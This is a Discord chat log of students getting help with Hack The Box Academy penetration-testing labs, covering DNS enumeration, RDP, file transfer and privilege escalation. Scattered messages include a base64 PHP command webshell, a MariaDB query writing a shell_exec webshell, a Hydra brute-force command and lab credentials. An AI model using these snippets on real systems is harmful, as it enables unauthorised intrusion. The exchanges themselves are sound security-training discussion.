#modules
Keep digging. Did you look at the other pages, like author? I don't have my notes for that module off hand but I do remember being really frustrated with THAT question and finding the answer on a page I wouldn't have expected.
It just depends on what you found, as it could be benign traffic, thus consulting IT is the way to go.
The skill assessments don't generally offer any sort of explanations
It's mostly meant to be based off knowledge and the module material; maybe something in the material pointed to it but you overlooked it.
I just went back and did the manual enumeration methods they taught, I was able to find the answer you're looking for. Specifically curl with 3 different grep inputs.
It is something you get a feeling for over time and sometimes the answer is not black or white. Is there a specific question where the answer confuses you?
Hi, my VirtualBox refuses to open the VM, issuing the error
"Result Code:
E_FAIL (0X80004005)
Component:
SessionMachine"
Is this happening to anyone else? This time yesterday it worked and I haven't changed anything. No updates, file access isn't a problem.
Humf, can't reach the IP of the section.
And can't spawn pwnbox
Try resetting your Host
Skill issue (are you connected to the vpn?)
Yes, VPN is connecting OK.
2024-03-20 15:38:47 Initialization Sequence Completed
Does ip a only show one tun0?
Yes, only one tunX device.
I've tried it, as well as disabling Hyper-V and a few other things, nothing seems to work. I also restored to an earlier snapshot and it didn't achieve anything.
For the active infrastructure identification they gave me 2 vhosts to use but I can't access them on my machine. Am I supposed to add them to the /etc/hosts file or something? They didn't give me IP addresses for them, or am I making this more complicated than needed?
IP is the TARGET IP that you spawn
So for example you add into /etc/hosts
<TARGETIP> app.inlanefreight.local dev.inlanefreight.local
Thank you
Same applies to hackthebox
Like they have other .hackthebox sites as well under their table
academy.hackthebox (for academy)
app.hackthebox (for Labs)
etc
Maybe easier to understand if you think about hackthebox
If you successfully added them to the hosts file you can visit the website and it won't throw you an error anymore, example
did I do this right because I'm still getting the error?
Yeah. For future reference you can just do them both in one line, 10.129.245.118 app.inlanefreight.local dev.inlanefreight.local
I would double check the box didn't die off due to being up too long, and make sure you're on the VPN
I'll double check, but I originally just put it on one line and it just kept giving me an error, so I tried 2 lines
You can see it already doing it with ::1 and localhost, ipv6-localhost, and ip6-loopback
But it doesn't hurt to have them on separate lines
Yeah, it's the same difference, but it'll just help not having to put the IP every time
It's working now
Just makes your file cleaner
Also not sure what box you're on, but sometimes it takes a few minutes for the boxes to spawn even if they're online, because the services etc. can take some time to launch
That also can be a factor
I think that's what it was
@fringe urchin are you doing the whole cpts path or just some modules from it?
Full path. Want to get cpts cert
So I am in the Shells And Payloads Live Engagement Module, one question, is the host that you RDP into just not supposed to have a web browser?
there is a web browser
I got the correct answer for the cms but a little still confused on what a cms is
CMS is a content management system, it lets you build websites without prior knowledge of code, so you don't have to code the site. Like WordPress.
firefox
I do not see it anywhere
Type it in the terminal
Idk if this is off topic, but I saw a LinkedIn post, it's like a prolab? Named hailstorm/cyclone/blizzard. May I ask, are those part of the prolabs subs or what? It's my first time hearing about them and I'm interested!
Not working, connection refused.
In the terminal of the jump host they give you
I think those are enterprise prolabs, so no dedicated channel for those, I suggest reading and following #welcome to access more of the server
Well, can somebody tell me how to get started in reverse engineering or get into modding
or making paid games available for free like Pirate Bay
I have learned C, C++ and Java
That’s what I’m doing
Well it worked fine for me when I did it
Remember they give you 3 targets to focus on
alright brother
About modding games, hackthebox academy has a module about that. No clue how good it is tho
It's basic reversing
Ah
Not so much for AAA games
Most of them run denuvo either way💀
Yeah so am I supposed to rdp to each one of these from the foothold machine? Good lord
No. They all are interactable in different ways, none require a second rdp
Ok well I need a web browser and nothing is here.
Yes there is
It's just not in the gui to click on
Open a terminal in the host, type firefox, hit enter
No protocol specified
Unable to init server: Could not connect: Connection Refused
Error: cannot open display: :10.0
Used xfreerdp as instructed
Weird, and you're not trying to open it with root. Yeah?
connection refused, confirm ip and port
Maybe target went offline? Refresh the htb page?
Well if they're just launching firefox with no arguments, it shouldn't give any error like that
If the target was offline you wouldn't get a connection refused
Well they're connected to the foothold host
Has to be online to get refused
Oh yeah, I thought that error was from RDP
And the targets for the Shells and Payloads module - Live Engagement are on an internal network
I shall stay silent
Yeah it was root 🤣. Fml lol
You almost never have to be root; if you do, just use sudo
Yeah I su’d to herb-student. It just gave me root when I logged in didn’t realize it
Htb-student *
history
Yeah, subdomain active enumeration is stumping me with the text records. Tried nslookup and dig and got nothing
Maybe I'm using the wrong domain 🤷🏿♂️
Sometimes you gotta look within
Hello
Going to have to really process that one
Don't think too hard on it
If you didn't get the flag then yeah, wrong subdomain
It's in plain sight
First time seeing an optional exercise. Are they worth doing, or are they just there so you COULD try out all the other methods from File Transfer that you didn't get to use in the 2 questions above?
They're worth doing imo, to understand them
Right, so I see how other stuff works. Yeah, I figured it was better to ask here if they are worth it since I saw you talking about how most ppl just skip them, ty
As has been shown multiple times in here, people forget the basics of file transferring

And it's good to at least understand different methods, that way if A fails, you still have B
Yeah, right
And it's better to have a screenshot somewhere of a working B transfer
So you don't need to troubleshoot on another host where it's, for example, blocked
Hi, I'm in the Linux Pass the Hash section, I've got the flag but it is malformed
What should I do?
It sounds like it may have gotten malformed in smbclient. Can you read the file?
Nvm, I just realised it was a fake flag

The real flag is in the user directory HAHAHAH

Imagine that's the file for another challenge though
Using print? I tried print but no access 😭
print prints it to a local printer, iirc
You can do like type or more
Remember, SMB is a Windows-based protocol
dork
I meant connect with smbclient directly
Don't download files or do anything fancy
Just connect, and don't send the command flag
Perhaps it's treating the file weirdly
Iirc this one was a bit silly
Also, aren't you meant to be connecting to Carlos's share for his flag?
https://academy.hackthebox.com/module/147/section/1322
Hey, the creds of Kira have disappeared. I tried to mutate the password of the user Kira and to authenticate, impossible
that's highly unlikely
ooo okay
Nope, I just solved it yesterday
The pw for the SSH key is different from her pw
We agree that there is a module that asks you to log in with the user Kira and his password love? From memory I don't remember it, I can't find this section, but I made it.
What are your views about Indian hackers?
There is a section that references using their password to obtain credentials for another user
But none of the answers contain her pw
Take this as a lesson to always save credentials you find
@fathom pendant wanna answer the question I asked?
lmao
Anyone?
I don't have an answer for you nor is this the place to entertain that discussion
as I don't really get the underlying question: if you're referring to scammers, they aren't hackers
then I don't get the point of your question, aside from potentially being racist
@acoustic owl It redirected me here!
no it didn't
It actually did!
This is just one of the few channels you can see without being verified
Oh ThnQ
This would be a Snort keyword, and you'll want to include the ; at the end. To give you a quick reference you can look at the list here:
https://docs.snort.org/rules/options/payload/http/
Can I get another hint on finding the TXT record? With every subdomain I use I get an't find inlanefreight.htb: No answer
Can you tell me which subdomains you already tried
I'm pretty sure I tried all of them I think and I'm using the -query=TXT
Would you still need to put the IP address after the domain?
I'm going to switch to using dig instead, see if I get something different
I've been arguing for this for over a year now. Sadly it ain't happening anytime soon
Yea
Well with dig yes
damn lol I'm really not understanding anything but the first 2 questions for this one
So I just checked and yeah, the flag can be acquired both ways. With dig and nslookup
and here I thought I would be done with this module today lol
In the client-side validation, when I modify the HTML and remove what's inside the onchange and try to upload, it works, but the source comes to me as base64 and I get something like data:application/x-php;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==
Can you show me the command you used
Yea but wrong subdomain
Well shit
If the flag isn't there it's the wrong subdomain
Okay will keep looking
There is like what around 20 subdomains iirc
What module/section?
file upload - client-side validation
First two? Like how many zones there are? Well, that just means how many of them are zone transferable, like axfr, it's a small number
Yeah, I got the first two questions right, but they aren't helping me with the rest of them, and I know for a fact now I tried every subdomain from the axfr one I used
They all give me this
You need the IP behind as well
<@IP>
Oh, it's nslookup
Without @ then
Just the <IP>
Just because you have access to it doesn't mean other tools like dig etc. can resolve the correct IP, that's why you need to specify it
I think I need to revisit my footprint notes on DNS ik this shouldn't be hard but all these questions are getting me
If you add the IP at the end you have the correct syntax but wrong subdomain
Yeah, the module has you use nslookup, which is alright, but dig is far better
But with either one you need to specify the name server you're querying
You need to follow the module to a T, once you have uploaded the "image" you will have your shell
Another q do I need to put the target ip in my etc hosts for the other questions 🤔
If the section doesn't specify it then no.
Maybe in later modules it won't tell you
Got it
I would suggest first finding the correct TXT zone for the question. Before going for 2 questions that are after it
Okay will do that then
Doing Modern Web Exploitation Techniques, SQLi websockets section. I'm trying to follow along in the module, but the victim box isn't behaving like the module shows. It says to enter " UNION SELECT "1 which I do, and in the example it shows a successful SQLi, but when I do it, it adds a backslash before the double quote. The module doesn't say anything about this or bypassing it. Am I doing something wrong? I feel like this isn't the intended behavior of the victim box. Green is the example, red is me following the example.
sqlmap is also unable to exploit it, but the module says it can
You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer. Attacking Common Services, I am logged into the MySQL server... but I don't get what I have to do next...
What section?
Skills Assessment the easy one
||MariaDB [test]> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
ERROR 1 (HY000): Can't create/write to file '\var\www\html\webshell.php' (Errcode: 2 "No such file or directory")||
It seems like I do not have write access?
"no such file or directory"
^ Everything you need can be found in the txt file from ftp including the right webroot directory.
Aaah, oh my god. Never would have thought about that note. Thx
So this is the list of subdomains I'm using to find the TXT record. Is this the correct list? I used dig axfr inlanefreight.htb @targetip
Yes, one of those is the correct one.
The target IP is the IP on the website and not the ones of the right side. Just in case
Ahh, so I was supposed to use the target IP for each subdomain
I was using the IPs given in the list of zones
Use the one from the website for all
Still lost on the other questions, but feels good I'm done with that one
Have you found out where the txt is?
yes
Then for the next questions you can use that specific one
Tracking, will do
You're already on file transfer right? I feel so slow lol
Yeah. I'm only doing like 2-3 hours per day since I'm in a diff country
Everyone should go at their own speed
I'm not going fast either
I'm pretty much like that as well and I get that
Question for anyone: the CPTS path is more tailored toward network penetration testing vs web, correct, with a little web? Or am I looking at it wrong?
Hello
Right.
Hey
hello
can i dm you?
ok sure
Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)
Apparently nothing is right, I don't pivot with Metasploit
Hint: it's the one with the same 3 octets
It's asking for ip/mask
Thank you lol, I wish it woulda just said that
So I'm doing the virtual hosts part and am using ffuf with the SecLists namelist.txt to find subdomains, but the list came out huge. However, that is what I assumed they wanted us to do. Am I at least thinking correctly on this one?
Ok yeah, I went and looked at the correct questions. Mb
So yeah, ffuf is being used. Yes, the list is big, but a lot of them are just default installation pages. So you want to filter them out
In the module it's explained already how to filter them out via size
good hint
Hey all, with the question: "Study the following resource https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html to learn how WannaCry performs shadow volume deletion. Then, use yarascan when analyzing "/home/htb-student/MemoryDumps/compromised_system.raw" to identify the process responsible for deleting shadows. Enter the name of the process as your answer. " I don't think I quite understand the question. I know how VSS works but that doesn't seem to be the right answer. Can anybody help me with a hint? 🙂
VSS was initiated by another process to delete the shadow copies
I'm working on "Windows Privilege Escalation Skills Assessment - Part I" and I got PrintSpoofer on the target and nc.exe. It keeps giving me the same error but recognizes the impersonate.
try another tool
If you wanna use PrintSpoofer, don't go for blogs on Google
Just go to the Windows PE module --> SeImpersonate section
and follow their command
I did but I’ll look into the other tools they used as well thanks
Good luck 🍀
Thanks brother cuz I need it damn
Do you guys take notes of what you figure out in labs too?
It's a good way to understand the mindset
Saves re-googling stuff or needing to re-remember something
I tried to use evil-winrm to get access to host 1 and now I want to get a shell on host 2, which is inside the internal network. Do I need to do pivoting? Because I tried to nc host 2 via host 1 and got the shell, but it is not interactive (I do not get any response)
my lab?
Yes, you'll need to set up pivoting to access any other internal hosts from your primary
It's not strictly required for the lab, however
No, I'm doing Pass the Hash Windows
Which I'll need to access DC01 from host 1
You can PtH from other tools within the host; but also I believe with the Windows boxes you can usually RDP to them
Yes, I can RDP, just want to know why direct nc won't work
If you don't want to follow the question instructions, psexec should work, you'll need to pivot tho
thanks for the info
Imo passing the hash from one Windows machine to another to get a revshell kinda defeats the purpose since you can usually directly authenticate to it
I'm on PtH Linux, I can't find the keytab/cache for linux01
Use find to search for the keytab
Well, it's there.
It just doesn't have LINUX01 attached to it xd
xD
Linux Local Privilege Escalation - Skills Assessment
I found flag 4 and now have a website with user T, and I want to get a reverse shell from the webshell I uploaded to use it to escalate my privilege. Can someone give advice on how I can get a reverse shell from here?
Do I need to put my password in a text file? Or is this command indicating what file to download? It's saying: Now we can begin transferring files. We need to specify the IP address of our Pwnbox and the username and password.
scp user@ip:/file/path /local/path
Decided to do an HTTP server and curl it, but thanks for that, adding it to my notes 😛
Also works for upload
scp <local path> <user>@<ip>:<remote path>
@next bronze and you're using your tun IP from the OpenVPN, right?
You just have to start an SSH server on your machine for this
No, you connect to the target IP
For the download one* for this lesson I had to SSH into the target and download a file to use hasher
Do I still use the target IP? Or my box for the IP for downloading
The box IP
Got it, thanks!
It also works the other way around if you want to run the SSH server, just that you need to swap the upload and download
Hello! I've been stuck for hours in Command Injection / Skills Assessment, could someone help me please? Or a hint? It's about the following:
||If I am not wrong, at the injection part, the application tries to do some action, BUT, the thing is that every command that I try to inject (obviously in an obfuscated way) gives me, for example: 'cat' is not a directory, 'mv' is not a directory...
Alright, so I'll use flag.txt to move, taking advantage of the web app's own 'mv' mechanism, but... * Permission Denied *
||
SOLVED!
But Holy Sweet baby... what a Lab

Can anyone provide insight as to why this is happening? I think it may be because of how strings in JSON are handled, but this doesn't seem to be the intended behavior. How do I get around this?
Honestly feel like this one is actually broken
anyone?
What have you tried to get a rev shell?
Intro to Digital Forensics: Skills Assessment
Question 4: Determine the folder that contains all Mimikatz-related files and enter the full path as your answer.
Hint: Enter the parent folder of either "Win32" or "x64".
Could anyone help me on this question? I am stuck searching around the collection given on the machine to find the folder related to Mimikatz
**Module: Attacking Common Services, Section: Attacking DNS,** Question: why is subbrute not able to resolve the subdomains for inlanefreight.htb?
Resolving hostnames has nothing to do with a specific application, but instead with how your resolver resolves those hosts. If an app isn't able to resolve it, it means your resolver can't. In this case, on a private network, your computer would need to call out to the internal nameservers within that private network to resolve the hostname. That's why you just add the hostname to /etc/hosts, because it forces your computer to resolve those hosts you have input there into the IP you chose. So it's not resolving because your computer's nameserver is likely calling out to your public ISP's nameserver to resolve the host, which it can't, because the public nameserver has no idea what your private hostname resolves to.
The modules I've worked on that require several subdomains to be resolved have given me those hostnames and told me to add them to /etc/hosts, so maybe you missed that part
I have added the target IP into the resolvers.txt in the subbrute dir, and ran ./subbrute.py inlanefreight.htb -s names.txt -r resolvers.txt
And I did add the IP into /etc/hosts and named it inlanefreight.htb
Or did I miss out on something else haha
The resolvers.txt tells your computer which nameservers to call out to, so when using that syntax you actually do call out to hackthebox's internal nameservers, so you should be able to resolve them without them being in /etc/hosts.
Which hostname are you unable to locate with subbrute?
I could not locate inlanefreight.htb with subbrute
Which question are you on?
The only question for Attacking DNS:
Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
One sec, let me try
Appreciate it 🙂
Can someone help me download hashcat?
Okay, I got the flag again. Can you show the contents of resolvers.txt?
Remove the IP from your hosts file, it's not required for this. You use that IP as the nameserver only
Ok, can I PM you?
yeah
Does anyone know how to proxy nmap through Burp or ZAP?
proxychains.conf has been changed to include 127.0.0.1 8080
proxychains nmap .....etc
and
nmap --proxies http://127.0.0.1:8080 .....etc
Both complete, but neither ZAP nor Burp captures any traffic
If proxychains is configured you just use that command. Like: proxychains nmap -sV -sC 10.10.10.10
Thanks got it now ! 🙂
I tried that, but I still don't see any intercepted traffic in Burp or ZAP. But I tried proxychains curl --cacert /selfsign/dir/loc https://site.com and that works no problem. I see the GET request and response, but for some reason I can't see nmap traffic
Sorry, I'm just new and want to learn how I can start an instance? It says Free users are allowed 1 Pwnbox spawn per day.
Just click the green Button
@acoustic owl can you confirm if the Modern Web Exploits SQLi section is working as intended?
I honestly think it's broken
Check if you can access with the creds you have, maybe some shares
I'm only on my cell phone and can't test it at the moment.
If you think something is not working as expected, please contact support
Lol, the contact page says go to Discord
Need to speak to a person? Learn how to reach our support via HTB Labs.
There is no official support on Discord.
I see, the help center is not available on academy, only apps.hackthebox.com
I can see it over there
You should see the green bubble also on the academy page
I'll have to deal with it later, it's saying I have adblock which is preventing me from contacting support. I disabled uBlock and Pi-hole and it still doesn't work.
Holy, is it my problem or HTB currently?
Did you manage to solve it? I am stuck there as well.
This can be your network, it can be the HTB server or anything in between.
Alright, thanks
Hi
@next bronze Got it, I have to say this was one of the hardest steps in skills assessments that I have encountered in HTB Academy.
Anyone else having laggy latency on HTBA?
It's much laggier with ping than usual
What's this error?
I don't see any errors
Hey everyone 🙂
I've been stuck on this question for a couple of days.
Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
It's in the ATTACKING COMMON SERVICES --> Attacking DNS module.
I ran python3 subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt after I added ns.inlanefreight.htb and ns1.inlanefreight.htb to the resolvers.txt.
After an hour or two I got these subdomains:
inlanefreight.htb
So this is what my /etc/hosts file looks like now:
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.103.34 inlanefreight.htb
I can't perform any zone transfers... and I don't know exactly what to do next.
Any tips?
There's an important tip you may have glossed over in the module. ||you can perform a zone transfer attack on subdomains||
One of those subdomains is correct, and I suggest removing that part of your message, as that's a spoiler
You also don't need to add them to your /etc/hosts
(it's not a guarantee that those subdomains are even on the same IP)
I see, thank you both 🙂
I will try again
dig - @ip
nslookup - add the ip after the subdomain
You're still querying the same server
Okay, I see 🙂
Thanks a lot
Trying to get another perspective on Module: Attacking DNS, Question: Why isn't subbrute.py working as it should?
./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt -v
resolvers.txt only contains the target IP
Looks fine to me, you added -v so there's a bunch of extra info
But aside from the verbose info
nah, it's just verbose
Oh true, don't use verbose lol
gogo
It's not failing or anything, just showing extra info that's irrelevant
So instead of clean output it's messy/all info of every step
Power Rangers?
Module: File transfers
Linux File Transfer Methods
So after uploading upload_nix to the server I wanted to unzip it. I managed to do it without many problems, but I want to know what other people use/prefer if not much is installed on the system?
Like unzip and jar didn't work since they aren't installed, so I wrote a quick python3 script that unzipped it
Are there any other methods that are better?
(in a scenario where you NEED a zipped file on the server)
gunzip
Just tried it out, had to rename zip to gz, then it worked and gave me the same hash as the one with my python3 script. Looks like less of a hassle lol
ty
haha definitely
Tar prob would have worked too 
unzip should be a default command
But idk, been a minute - I don't recall issues with unzip
In that exercise we had to SSH into the htb-student account and unzip wasn't installed
sudo apt install unzip
[sudo] password for htb-student:
htb-student is not in the sudoers file. This incident will be reported.
You wouldn't be able to install anyway
The labs aren't internet facing
Hello, I've encountered a problem with the "Attacking Common Services Module" in the Attacking SQL Databases section. When attempting to connect to the database using the provided credentials, neither sqsh nor mysql are successful; only mssqlclient.py establishes a connection successfully. Additionally, I'm experiencing connectivity issues with the target machine, as it loses connection every few minutes.
Yes, mysql won't be successful against an MSSQL database. For the connection issues, however, try changing VPN regions and using TCP VPN
I'll give it a shot, thank you very much for the suggestion!
dashboard
I never even noticed it
Haha yeah, I wish it had its own section
Hey, I'm back again 😦
I'm sorry to bother you again, but I tried everything again... and still no luck
From the module I can see that
dig AXFR @subdomain.inlanefreight.htb inlanefreight.htb is used and I tried it on all the subdomains I found. But I'm not getting anything other than: dig: couldn't get address for 'subdomain.inlanefreight.htb': not found.
I know MarcieLee told me not to add the subdomains to the /etc/hosts but i tried it anyways (out of desperation) and i got this output:
; <<>> DiG 9.19.21-1-Debian <<>> AXFR @subdomain.inlanefreight.htb inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
What's the name of this module?
Because that's not how dig works
dig axfr subdomain.inlanefreight.htb @ip
You need to understand the command. The IP after @ is the name server (DNS) that you're using to look up the hostname. The second input is the hostname you want to look up. The correct command would be dig AXFR @<name server, which is the IP from the box you spawned> <hostname>
nslookup is the one that's positionally dependent
nslookup -query=AXFR subdomain.inlanefreight.htb <nameserver or ip>
Thank you guys, I got the answer 🙂
I will read the documentation about dig and nslookup... this is important information that I should be ready for in the exam.
Hi all, bit of a weird one - I am going through the "Packet Inception, Dissecting Network Traffic With Wireshark" module (https://academy.hackthebox.com/module/81/section/789) - I've got question 2 answered, but question 1 is giving me issues.
I am just not seeing any image transfers over HTTP. I can see an image transferred over FTP, but that's not correct. The question hint gives 2 file names that I should apparently be seeing, but I am not. Starting to go around in circles now, questioning whether this is just a bug...
The @ for dig tells it what nameserver to use
In this case, you're using the ip/ns of inlanefreight.htb to query/ask the subdomain for information
Module: Attacking email services, Question: I am trying to brute force password for user m***** using Hydra but unsuccessful
Command: hydra -l m***** -P passwords.list -f <targetip> smtp/pop3/imap
Are you including the domain as part of his username?
Nope I didn’t
Yeah, I understand this now 🙂 thank you very much
Has anyone encountered this issue before? Not sure how to solve it, and searching did not help much so far. It is related to the last question on Using CrackMapExec > Gathering Information with an Admin Account > Command Execution :
$ cat julio_keys1
┌──(kali㉿CSpanias)-[~/htb/pentester_path/cme]
└─$ file julio_keys1
julio_keys1: OpenSSH private key
┌──(kali㉿CSpanias)-[~/htb/pentester_path/cme]
└─$ nxc ssh 10.129.204.178 -u julio --key-file julio_keys1 -p '' -x 'type ~\desktop\flag.txt'
SSH 10.129.204.178 22 10.129.204.178 [*] SSH-2.0-OpenSSH_for_Windows_7.7
SSH 10.129.204.178 22 10.129.204.178 [-] julio: (keyfile: julio_keys1) unpack requires a buffer of 4 bytes
Thanks in advance!
How to open a Word document that is password protected?
LibreOffice and xdg-open don't support password input
LibreOffice does
As long as your key file is correct that should work. try CME not NXC. Looking at my notes CME worked without any issue.
-p? I tried but can't
Have you tried entering the password
I opened it in gui
On the module Cracking Passwords with Hashcat > Identifying Hashes - Which format should the answer be? I've found the hash but it's not accepting any versions of the answer
I haven't looked at it in a long time, but is it asking for the mode number?
Or the name?
It just says 'Identify the following hash:'
Ran hashid but it's not accepting the answer :/
Hmm, I'd need to look back at the module
Thanks, but it produces the same error:
$ cme ssh 10.129.204.178 -u julio --key-file ~/htb/pentester_path/cme/jul_ssh.priv -p '' -x 'type ~\desktop\flag.txt'
SSH 10.129.204.178 22 10.129.204.178 [*] SSH-2.0-OpenSSH_for_Windows_7.7
[13:52:49] ERROR unpack requires a buffer of 4 bytes ssh.py:172
Traceback (most recent call last)
/home/kali/.cache/pypoetry/virtualenvs/crackmapexec-ODn8AvZr-py3.11/lib/python3.11/site-packages/paramiko/pkey.py:525 in _uint32_cstruct_unpack

522                     arr.append(s)
523                 if f == "i":
524                     # long integer
❱ 525                     s_size = struct.unpack(">L", data[idx : idx + 4])[0]
526                     idx += 4
527                     s = data[idx : idx + s_size]
528                     idx += s_size
error: unpack requires a buffer of 4 bytes
I will try from a parrot instance
weird that you're just typing cme and it's calling to poetry and venv
I have put an alias in my bashrc file!
try running it normally outside of the venv or something
got it
ok
probably had a typo or something
It works fine on the Parrot instance. I will default to that when trying things from now on. I have spent too much time troubleshooting for nothing 😭
it happens! glad you at least narrowed it down and could complete the task
Something is messed up with your venv instance probably
Yea, I have worked through the whole CPTS path without issues, but on the CME module I have many issues that seem really weird.
is it best to get CPTS or Academy to study for OSCP?
If it's been disabled definitely go to insta support
Otherwise, nothing we can do for you brother
Hacking Instagram is not something we can do
Do you guys know how to code me out of it?
I suggest not breaking platform ToS to get your account disabled
OSCP teaches you to pass OSCP. Academy teaches you to pass CPTS.
I'm trying to study for OSCP. Right now I'm using free HTB but in 1 week I want to either get the Academy, VIP HTB or something else
oh I didn't know
CPTS helps you crush OSCP
trying to decide
If you want to pass OSCP, you should just take their course. They teach what you need to know for their course, just like every platform.
Does anyone here know someone that has any type of contact with someone that works for Insta?
tried it in 2020. still have the notes
No, now stop asking
I heard they've massively revamped their course since then, so that's probably out of date.
This isn't even remotely the appropriate channel
yeah I don't want to shell out 1 grand again
or more I think
did we travel back in time?
ok, but if your plan is to get an OSCP cert, you need to buy their stuff.
yeah the retake fee for sure
now is oscp worth it is a whole other question. you cannot beat the price to value ratio of htb, the content here is top tier
but you're asking 'i want to pass course a, should i learn about b to learn about a?'. like you're asking if taking sec+ will help you pass net+.
ok well
I guess I'll just get the Academy to help me
the content is all still relatd
related. it's all cybersecurity
yeah but they're going to have different standards for things, like reporting
if you want to get a specific cert, then you should study the course for that cert, not some other course, it doesn't make sense
if your goal is learning cybersec, then yeah sure it doesn't matter, but that was not the premise of your question
I'm getting a lot of different answers
and idk why you're arguing it when you're the one who asked the question lol seems like you already made your mind up
well everyone but me is wrong
wtf? I'm not arguing at all
just saying that there are a lot of different opinions on it
CPTS modules make you ready for OSCP, but that doesn't mean you should go for the CPTS course; don't take it, take OSCP instead
If you want the OSCP cert go for the OSCP learning modules. If you're going for CPTS go for the HTB modules
if you're using the CPTS course to study for OSCP you might as well just do the CPTS exam
and then go do OSCP
it's a win-win imo
I have a question in the Linux fundamentals module: "what is the name of the last modified file in the "/var/backups" directory?" I use the cmd 'ls -la -t' which works fine. But then I saw 'ls -lat' which gave me the same results. If I am adding options to a command, let's say hypothetically 'ls -la -t -a -b -c', can I combine them like so: 'ls -latabc'? If so, does this work with all types of commands?
yes, you can, doesn't work on all commands though
thanks. that is pretty awesome to know
crackmap winrm is hydra rdp?
is that a question
yes
winrm and rdp are separate protocols
ah shit
winrm = windows remote management
rdp = remote desktop protocol
winrm is gonna be CLI access
well it's usually set up to drop users into a powershell session
oh it's powershell
you'll know if you have the PS in front of the current working directory
Actually, how hard is the exam compared to the practice labs on a scale of 1 - 10? Or shouldn't I ask?
PS C:\windows\system32>
that's mostly a subjective question
the exam won't have leading questions that point you to the method of obtaining the flags or even users
I'll give you some freebie users, root and administrator
thank me when you pass the exam
the biggest pre-test is gonna be doing the Attacking Enterprise Networks module completely blind
okay will do
pace yourself and go over the modules when not confident to fully digest it
as in; just spin up the lab and go for total network compromise. don't read questions, and try to limit yourself on asking for help
it's why it's one of the capstone modules
do 200 htb machines
Dude, I see so many people stressing over the CPTS. Is it that hard?
I aced eJPT but now I'm worried
well I don't think anyone's going to say it's easy
eJPT is nothing compared to a cert like OSCP or CPTS
both are regarded as intermediate skill based exams
OSCP is mostly only tough due to its time restriction and tool restriction
CPTS is tough because it's a 10 day exam to go from start to Domain Compromise AND write a professional-grade report in that same time
hi
and their training. At least their old stuff. I've heard mixed reviews of their new course.
I've heard it's better, but the CPTS material is just better
yeah it's top tier for sure
I'm probably just missing something in the modules, but I'm on the first question section of SQLMap essentials and I cannot figure out how to enumerate a table. I haven't found anything in the instructions.
so i have 10 days to compromise AND write the report?
I thought it was an additional add-on to when you finish the exam
Hey, can some help be provided? I'm doing the attacking sql databases section from attacking common services. I managed to log in using the given credentials in the beginning using mssqlclient.py but I can't run any commands
What are you enumerating for?
I'm enumerating for the contents of a table
Just dump it
I'm trying to figure out the syntax for that. If I just put in the url and --batch and --dump it doesn't get the info I need
Anyone know how I can install another Linux on a device I bought that already has Linux? I don't know how to boot up a Linux flash drive on that (ps: it's a TV box)
You can add * at the id value to specify the location for the injection mark.
so like http://example.com/something.php?id=*
I'm in the
Working with IDS/IPS
Skills Assessment - Snort
There is a file named wannamine.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to the Overpass-the-hash technique which involves Kerberos encryption type downgrading. Replace XX with the appropriate value in the last content keyword of the rule with sid XXXXXXX within the local.rules file so that an alert is triggered as your answer.
I'm currently checking the Wireshark traffic and looking for || TGS-REQ ||. I'm not sure if I'm searching for the right thing, and even if I am, I'm not sure I understand the best way to find the XX
Yup, either or before the 1 or any value there.
In the attacking sql databases part of attacking common services, after one logs in using mssqlclient, how do you run queries in the database? I can't run any queries, getting some error
"getting some error"
please be more descriptive
"getting some error" doesn't provide us details as to what the error is
"Could not find stored procedure show" when I ran the show tables command
because show tables isn't an mssql command
re-read the section for the mssql syntax
^ this. it shows the syntaxes
it could also be under the SQLCMD syntax
the syntax you're using is for mysql, which has completely different syntax
for Password Attacks Lab - Hard section
I can't move the file via SMB, is there any way I can export the KeePass and SAM file?
I tried to change the access to 1, also not allowed
Ok I just found the answer but it clearly was not the right way to do it lmao, if someone can DM me it would be nice
Set up smbserver with creds.
but how can i insert the creds when moving file?
for example, move file \smb\
because they don't prompt for username and password
it should ask for it during the operation if creds are needed
nope
net use \\networklocation\sharefolder password /USER:username
Then move the file
You're my savior, thanks
hey I was wondering, I was doing the "NETWORK ENUMERATION WITH NMAP" module
and i reached this question :
Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer.
I got the flag and am sure it's the flag, but it keeps telling me it's wrong
Is there anything off?
oh sorry lol I got it
the one typing, if you are typing for me, thanks a lot
Hi, so I'm currently doing the "Windows Server" section of the "Windows Privilege Escalation" Path. I tried RDPing into the machine but for the life of me I can't do it. I scanned the box and RDP is open. I tried using evil-winrm because winrm is open but I can't use the creds provided. So I thought maybe I should exploit the box even though creds have been provided. It looks like the box is susceptible to EternalBlue but I can't exploit it for the life of me, tried logging into the smb shares (got nothing), tried accessing rpc and got nothing, couldn't browse anything. I've been on this module for 5-6 hours lol. I think I'm supposed to RDP into the machine because this section provided creds, but then again, I tried about 5 rdp clients (xfreerdp, remmina etc) and I can't connect on any of them, but when scanning with nmap the port is open lol. Oh and I have restarted the machine like 5 times, so I'm absolutely lost
What happens when you try to xfreerdp into the machine
I get a tls error transport_connect_tls:freerdp_set_last_error_ex
Tried searching for a solution but apparently it's a kali problem, so I downloaded the VPN to my ubuntu machine and try to log into RDP but still get the same error. Going back to a previous section, and I can RDP no problem
xfreerdp /v:10.129.39.13 /p:HTB_@cademy_stdnt! /u:htb-student
I'm dumb, I haven't tried it. It's so laggy though, but thanks so much for the suggestion
yeah just to rule out your computer you know
also was rdesktop in your 5 clients you tried
It's just worked with the pwnbox
It's super weird to me though. I've been RDPing through the CPTS course without any hassle, but with this specific module I had so much trouble. Thanks again for the help man
yeah np. just do it from there on this one haha
it instantly dies and I can't connect anymore. I don't know, I think I'll try again tomorrow
